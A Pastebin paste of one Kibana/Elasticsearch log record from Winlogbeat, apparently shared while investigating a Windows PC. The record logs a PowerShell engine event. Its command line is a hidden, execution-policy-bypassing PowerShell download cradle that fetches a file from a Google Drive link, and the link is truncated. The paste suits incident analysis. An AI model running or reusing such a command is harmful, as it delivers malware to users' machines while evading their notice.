SHARE
TWEET

Untitled

a guest Feb 22nd, 2020 84 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. {
  2.   "_index": "access-logs-2020.02.21_new_2",
  3.   "_type": "doc",
  4.   "_id": "U2EjZXABZmYPUeY3xrRB",
  5.   "_version": 1,
  6.   "_score": null,
  7.   "_source": {
  8.     "host": {
  9.       "name": "Richard-New-PC",
  10.       "hostname": "Richard-New-PC",
  11.       "id": "2c4f78bc-20ab-4f82-9817-49868bc59a1e",
  12.       "architecture": "x86_64",
  13.       "os": {
  14.         "name": "Windows 10 Home",
  15.         "platform": "windows",
  16.         "kernel": "10.0.18362.657 (WinBuild.160101.0800)",
  17.         "build": "18362.657",
  18.         "version": "10.0",
  19.         "family": "windows"
  20.       }
  21.     },
  22.     "message": "Engine state is changed from None to Available. \n\nDetails: \n\tNewEngineState=Available\n\tPreviousEngineState=None\n\n\tSequenceNumber=13\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.18362.628\n\tHostId=3dd1a50a-cc15-45e0-bf63-4456d556fb67\n\tHostApplication=powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download\n\tEngineVersion=5.1.18362.628\n\tRunspaceId=de762b62-056c-4be1-90bf-a12cfe6fbc72\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=",
  23.     "agent": {
  24.       "type": "winlogbeat",
  25.       "hostname": "Richard-New-PC",
  26.       "ephemeral_id": "b1060e1e-c51b-4879-9d2b-67e80ed520f8",
  27.       "id": "796f9b7c-31aa-4dee-ae62-c6cecc5e37f9",
  28.       "version": "7.5.2"
  29.     },
  30.     "@timestamp": "2020-02-21T00:26:46.987Z",
  31.     "log": {
  32.       "level": "information"
  33.     },
  34.     "ecs": {
  35.       "version": "1.1.0"
  36.     },
  37.     "event": {
  38.       "kind": "event",
  39.       "provider": "PowerShell",
  40.       "action": "Engine Lifecycle",
  41.       "code": 400,
  42.       "created": "2020-02-21T00:26:47.650Z"
  43.     },
  44.     "@version": "1",
  45.     "winlog": {
  46.       "event_data": {
  47.         "param2": "None",
  48.         "param1": "Available",
  49.         "param3": "\tNewEngineState=Available\n\tPreviousEngineState=None\n\n\tSequenceNumber=13\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.18362.628\n\tHostId=3dd1a50a-cc15-45e0-bf63-4456d556fb67\n\tHostApplication=powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download\n\tEngineVersion=5.1.18362.628\n\tRunspaceId=de762b62-056c-4be1-90bf-a12cfe6fbc72\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine="
  50.       },
  51.       "computer_name": "Richard-New-PC",
  52.       "channel": "Windows PowerShell",
  53.       "opcode": "Info",
  54.       "record_id": 652,
  55.       "task": "Engine Lifecycle",
  56.       "event_id": 400,
  57.       "keywords": [
  58.         "Classic"
  59.       ],
  60.       "provider_name": "PowerShell",
  61.       "api": "wineventlog"
  62.     },
  63.     "tags": [
  64.       "beats_input_codec_plain_applied"
  65.     ]
  66.   },
  67.   "fields": {
  68.     "@timestamp": [
  69.       "2020-02-21T00:26:46.987Z"
  70.     ],
  71.     "event.created": [
  72.       "2020-02-21T00:26:47.650Z"
  73.     ]
  74.   },
  75.   "highlight": {
  76.     "message": [
  77.       "Details: \n\tNewEngineState=Available\n\tPreviousEngineState=None\n\n\tSequenceNumber=13\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.18362.628\n\tHostId=3dd1a50a-cc15-45e0-bf63-4456d556fb67\n\tHostApplication=powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object @kibana-highlighted-field@System.Net.WebClient@/kibana-highlighted-field@).DownloadFile('https://drive.google.com/uc?export=download\n\tEngineVersion=5.1.18362.628\n\tRunspaceId=de762b62-056c-4be1-90bf-a12cfe6fbc72\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine="
  78.     ]
  79.   },
  80.   "sort": [
  81.     1582244806987
  82.   ]
  83. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top